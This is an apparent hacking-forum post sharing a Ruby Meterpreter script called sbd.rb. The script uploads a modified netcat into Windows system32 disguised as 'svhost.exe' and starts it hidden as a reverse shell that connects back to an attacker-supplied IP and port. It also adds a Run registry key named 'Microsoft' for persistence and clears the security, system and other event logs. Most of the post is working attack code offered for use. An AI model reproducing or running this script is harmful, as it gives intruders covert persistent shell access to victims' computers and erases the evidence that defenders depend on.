Jump to content
Gonzalez

sbd.rb

Recommended Posts

Posted

sbd.rb uploads sbd.exe runs as svchost.exe with the settings that are entered ny attacker

it autoruns via registry & autostarts as the script is run then clears system logs remeber it is a modded netcat for a reverse shell needs some more edits to script to hide the reg a little better but this will do till update time

session = client
host,port = session.tunnel_peer.split(':')
#Menu-Options
@@exec_opts = Rex::Parser::Arguments.new(
"-r" => [ true, "Resporn time limit." ],
"-p" => [ true, "Port Number to open." ],
"-k" => [ true, "Authentication name."],
"-h" => [ true, "Local ip address."]
)
def usage
print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ")
print_line("####################################################")
print(@@exec_opts.usage)
raise Rex::Script::Completed
end

#Files to upload to target host
ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")
#Function to upload files
def upload(session,file)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
fileontrgt = "#{location}\\#{"svhost"}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("#{file} Uploaded!")
return fileontrgt
end

#Function to execute sbd
def sbdrun(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Local Ip Sbd Will Connect Back On: #{ip}")
print_status("Local Port Sbd Will Connect Back On: #{port}")
print_status("Pass Phrase: #{auth}")
print_status("Respawn Time: #{time}")
end
#Fuction to add registry for sbd
def regadd(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
print_status("Adding to Registry ...")
session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Successfully added to Registry ...")
end
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]

begin
evtlogs.each do |evl|
log = session.sys.eventlog.open(evl)
log.clear
end
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")

end
end

#Menu-Imput
time = nil
port = nil
ip = nil
auth = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-r"
time = val
when "-p"
port = val
when "-h"
ip = val
when "-k"
auth = val
end

}
if port

upload(session,ncexe)
sbdrun(session,time,auth,port,ip)
regadd(session,time,auth,port,ip)
clrevtlgs(session)
else
usage
end

Video:

http://www.youtube.com/watch?v=imFAm3AxOuc

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...